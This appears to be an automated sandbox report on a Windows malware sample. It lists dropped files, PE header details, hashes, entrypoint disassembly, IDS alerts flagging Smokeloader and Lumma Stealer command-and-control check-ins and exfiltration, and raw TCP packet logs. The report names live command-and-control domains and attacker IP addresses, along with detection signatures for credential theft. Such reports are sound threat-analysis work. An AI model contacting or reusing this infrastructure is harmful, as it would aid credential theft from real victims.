C:\Users\user\AppData\Roaming\adjijwj:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.999824074808505
Encrypted:	false
SSDEEP:	6:coFvcDWq+VOQ57ENUU1pyARWVFQfFKDeXNGLx9gS73IXqFMJbukrWWd3wWxEGAv:cooWqs57EdYI4qSxySs6FR/WFwWE
MD5:	207662F3166DE75C958E06CCE88E1EBE
SHA1:	7B9E35EAFB7D580442A455E53EEC86F45C62C807
SHA-256:	FC4A7DE26D659FD15D61C38A8B7895B6232688D4AFADBD39CAF2C2EB82E03DC5
SHA-512:	37B5D843675B016BA9C54FA5C05C68418A6441E756CBAC151EC9CB079DBC9D6553CE3561A0E04885E254282F9A80F71A14EE87186CBA31E3E9455560AFB85848
Malicious:	false
Preview:	thread '<unnamed>' panicked at src\lib.rs:81:73:.called `Result::unwrap()` on an `Err` value: Os { code: 10048, kind: AddrInUse, message: "Only one usage of each socket address (protocol/network address/port) is normally permitted." }.note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.598294772115452
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
File size:	41'369 bytes
MD5:	eccdca95898d2ecce04660fad1209c1d
SHA1:	3be1d8f6d6a75943c1bf7af821d63a1701618f72
SHA256:	7231b59295966497d4a581249d0fd69dcef5de7981d5b3d09039310ca0b875c2
SHA512:	4f9f527d78ad54f606bb48a95f898d0fd66dd4020d2dea6787b350eaea85d2cf25e841e7d05a805bb21dbb6520507fd277e20e61aec11d9b8a48db77f041a63d
SSDEEP:	768:CNRArpFDnz5y+bgsDF5I0haNLj1PokgJ4T:CNRAfnzVF20MBj1PgJ4T
TLSH:	0103D0FF0CFAE66ED7B048B057A2A1210707B491220837C96565DCBF2DF6DD48827A2D
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......f...............H............+2............@.................................G......................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x6682D1B5 [Mon Jul 1 15:56:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
call 00007FD6C08B7E35h
jne 00007FD6C08B7E36h
je 00007FD6C08B7E34h
jle 00007FD6C08B7DC0h
pop ebx
jmp 00007FD6C08B7E3Ch
or byte ptr [ecx+003230EBh], al
add bl, ch
add eax, 08F5EB08h
or byte ptr [ebp+eax+75h], dh
add esp, esp
or eax, 04EC8330h
mov dword ptr [esp], 00000030h
jne 00007FD6C08B7E37h
je 00007FD6C08B7E35h
salc
dec esi
pop edx
jmp 00007FD6C08B7E38h
add byte ptr [ecx], ch
shr bl, 00000005h
and ch, bl
stc
add byte ptr [edx], ah
jmp 00007FD6C08B7E37h
or byte ptr [ecx], bh
xchg eax, edx
salc
test al, 64h
add eax, dword ptr [edx]
je 00007FD6C08B7E3Ah
jne 00007FD6C08B7E38h
or dword ptr [edi], edi
mov ah, 07h
bound edx, dword ptr [00A4B0FFh]
add byte ptr [eax], al
jne 00007FD6C08B7E37h
je 00007FD6C08B7E35h
imul esi, eax, 8Bh
or al, 24h
add esp, 04h
jmp 00007FD6C08B7E38h
rcl dword ptr [edx-7F6F572Ah], 1
cmp cl, 00000006h
jl 00007FD6C08B7E94h
jmp 00007FD6C08B7E3Dh
or ecx, dword ptr [ebp-4Fh]
push eax
xchg eax, esi
pop eax
jmp 00007FD6C08B7E37h
mov byte ptr [edi-148D0815h], dl
push es
xchg eax, edx
salc
test al, C0h
mov byte ptr [0248B60Fh], al
jmp 00007FD6C08B7E37h
mov byte ptr [ecx-7C57296Eh], cl
rol dword ptr [ecx], FFFFFFEBh
or al, 78h
and dword ptr [ecx+51CD9CA7h], ecx
pop eax
jmp 00007FD6C08B7E37h
dec esi
popfd
jmp 00007FD6C08B7E2Ah
mov ah, EBh
pmullw mm4, qword ptr [edx+68C6D426h]
int 31h
add byte ptr [eax], al
pop ecx
jmp 00007FD6C08B7E37h
cmp dl, dh
jmp 00007FD6C08B7E26h
push ebx
jmp 00007FD6C08B7E33h
mov ebp, 05EBE1F7h

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9172	0x9200	bf3def64535ab20f3ab859dfcc38e905	False	0.7404484160958904	data	7.062434505591146	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T07:43:26.412471+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62237	80	192.168.2.4	186.145.236.93
2024-07-27T07:46:53.007153+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62397	80	192.168.2.4	154.144.253.197
2024-07-27T07:43:27.450483+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62238	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:33.029215+0200	UDP	2054593	ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)	62643	53	192.168.2.4	1.1.1.1
2024-07-27T07:44:29.687325+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62285	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:06.515038+0200	TCP	2101390	GPL SHELLCODE x86 inc ebx NOOP	443	62252	185.149.100.242	192.168.2.4
2024-07-27T07:45:43.962407+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62353	80	192.168.2.4	186.145.236.93
2024-07-27T07:45:34.541448+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62347	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:02.548569+0200	TCP	2020757	ET ADWARE_PUP Windows executable sent when remote host claims to send an image M2	443	62252	185.149.100.242	192.168.2.4
2024-07-27T07:44:35.163444+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62290	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:26.807342+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62280	443	192.168.2.4	188.114.97.3
2024-07-27T07:43:55.210776+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62246	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:42.497421+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62302	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:23.528393+0200	TCP	2800584	ETPRO ACTIVEX Yahoo Messenger ActiveX Control Command Execution	443	62275	104.26.2.16	192.168.2.4
2024-07-27T07:46:05.361378+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62366	80	192.168.2.4	154.144.253.197
2024-07-27T07:44:33.545736+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62289	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:25.274776+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62277	443	192.168.2.4	188.114.97.3
2024-07-27T07:46:33.946962+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62385	80	192.168.2.4	154.144.253.197
2024-07-27T07:44:28.278022+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62283	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:39.170270+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62298	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:17.145990+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62262	80	192.168.2.4	186.145.236.93
2024-07-27T07:43:14.381658+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49730	40.127.169.103	192.168.2.4
2024-07-27T07:44:55.023320+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62311	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:53.089192+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62243	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:02.689427+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	62252	185.149.100.242	192.168.2.4
2024-07-27T07:43:56.878844+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	62248	80	192.168.2.4	64.190.113.113
2024-07-27T07:44:49.780615+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62306	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:52.008519+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62242	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:37.482189+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	62295	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:19.266655+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62267	80	192.168.2.4	186.145.236.93
2024-07-27T07:43:54.137677+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62244	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:40.155308+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62299	443	192.168.2.4	172.67.213.85
2024-07-27T07:46:43.349202+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62391	80	192.168.2.4	154.144.253.197
2024-07-27T07:43:24.082243+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62235	80	192.168.2.4	186.145.236.93
2024-07-27T07:46:14.497349+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62372	80	192.168.2.4	154.144.253.197
2024-07-27T07:43:28.524923+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62239	80	192.168.2.4	186.145.236.93
2024-07-27T07:43:21.959721+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62233	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:35.291152+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62292	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:12.576574+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62256	80	192.168.2.4	186.145.236.93
2024-07-27T07:45:56.071586+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62361	80	192.168.2.4	154.144.253.197
2024-07-27T07:44:24.616194+0200	UDP	2054591	ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop)	63695	53	192.168.2.4	1.1.1.1
2024-07-27T07:44:25.719221+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62277	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:36.341460+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	62292	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:28.497625+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	62282	443	192.168.2.4	31.14.70.245
2024-07-27T07:44:36.954814+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62295	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:58.889159+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62249	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:18.214510+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62265	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:01.039158+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62251	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:13.664053+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62257	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:20.306652+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62269	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:57.878119+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62315	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:02.840092+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	62252	185.149.100.242	192.168.2.4
2024-07-27T07:43:25.122767+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62236	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:59.418725+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62317	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:32.085320+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62287	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:34.786056+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62290	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:56.291406+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62247	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:26.379378+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	62280	443	192.168.2.4	188.114.97.3
2024-07-27T07:46:24.425999+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62379	80	192.168.2.4	154.144.253.197
2024-07-27T07:44:33.995308+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62289	443	192.168.2.4	172.67.213.85
2024-07-27T07:44:43.171318+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62302	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:28.792032+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	62283	443	192.168.2.4	188.114.97.3
2024-07-27T07:44:58.284227+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	62315	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:54.281013+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	62245	20.114.59.183	192.168.2.4
2024-07-27T07:44:23.587218+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62273	80	192.168.2.4	186.145.236.93
2024-07-27T07:43:59.940793+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62250	80	192.168.2.4	186.145.236.93
2024-07-27T07:43:23.015887+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62234	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:14.727736+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62259	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:38.229626+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62296	443	192.168.2.4	172.67.213.85
2024-07-27T07:45:16.740499+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	62336	443	192.168.2.4	172.67.213.85
2024-07-27T07:43:29.561094+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	62240	80	192.168.2.4	186.145.236.93
2024-07-27T07:44:04.554660+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	62252	185.149.100.242	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 07:43:20.890503883 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:20.895600080 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:20.895714998 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:20.898057938 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:20.898077011 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:20.903158903 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:20.903172970 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.957808018 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.959553957 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.959721088 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.960078001 CEST	62233	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.963211060 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.965471029 CEST	80	62233	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.968295097 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.968380928 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.968509912 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.968509912 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:21.973660946 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:21.974303961 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.015682936 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.015711069 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.015887022 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.016053915 CEST	62234	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.018776894 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.024247885 CEST	80	62234	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.026743889 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.026823997 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.026930094 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.026974916 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:23.034265041 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:23.034331083 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.082078934 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.082140923 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.082242966 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.082418919 CEST	62235	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.085568905 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.088762045 CEST	80	62235	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.090538025 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.090636969 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.090785980 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.090817928 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:24.095558882 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:24.095657110 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.115849972 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.122677088 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.122766972 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.122858047 CEST	62236	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.131243944 CEST	80	62236	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.141081095 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.146014929 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.146105051 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.146294117 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.146311045 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:25.152695894 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:25.154588938 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.412009001 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.412023067 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.412471056 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.412601948 CEST	62237	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.415368080 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.417705059 CEST	80	62237	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.420572042 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.420654058 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.420757055 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.420789957 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:26.425540924 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:26.425668955 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.450252056 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.450416088 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.450483084 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.450572014 CEST	62238	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.453270912 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.455528975 CEST	80	62238	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.458123922 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.458193064 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.458329916 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.458364964 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:27.463527918 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:27.463536978 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.524715900 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.524734974 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.524923086 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.525321960 CEST	62239	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.527903080 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.531008959 CEST	80	62239	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.533817053 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.533900976 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.534025908 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.534059048 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:28.539604902 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:28.539771080 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:29.559906960 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:29.560937881 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:29.561094046 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:29.561094046 CEST	62240	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:29.563385963 CEST	62241	80	192.168.2.4	77.221.157.163
Jul 27, 2024 07:43:29.566068888 CEST	80	62240	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:29.568551064 CEST	80	62241	77.221.157.163	192.168.2.4
Jul 27, 2024 07:43:29.568624973 CEST	62241	80	192.168.2.4	77.221.157.163
Jul 27, 2024 07:43:29.568747997 CEST	62241	80	192.168.2.4	77.221.157.163
Jul 27, 2024 07:43:29.573708057 CEST	80	62241	77.221.157.163	192.168.2.4
Jul 27, 2024 07:43:50.958343983 CEST	80	62241	77.221.157.163	192.168.2.4
Jul 27, 2024 07:43:50.958442926 CEST	62241	80	192.168.2.4	77.221.157.163
Jul 27, 2024 07:43:50.958529949 CEST	62241	80	192.168.2.4	77.221.157.163
Jul 27, 2024 07:43:50.962459087 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:50.963481903 CEST	80	62241	77.221.157.163	192.168.2.4
Jul 27, 2024 07:43:50.967374086 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:50.967586994 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:50.967586994 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:50.967633009 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:50.972578049 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:50.972588062 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.008378983 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.008423090 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.008518934 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.008861065 CEST	62242	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.013855934 CEST	80	62242	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.040102959 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.045279980 CEST	80	62243	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.045362949 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.045492887 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.045527935 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:52.050380945 CEST	80	62243	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:52.050666094 CEST	80	62243	186.145.236.93	192.168.2.4
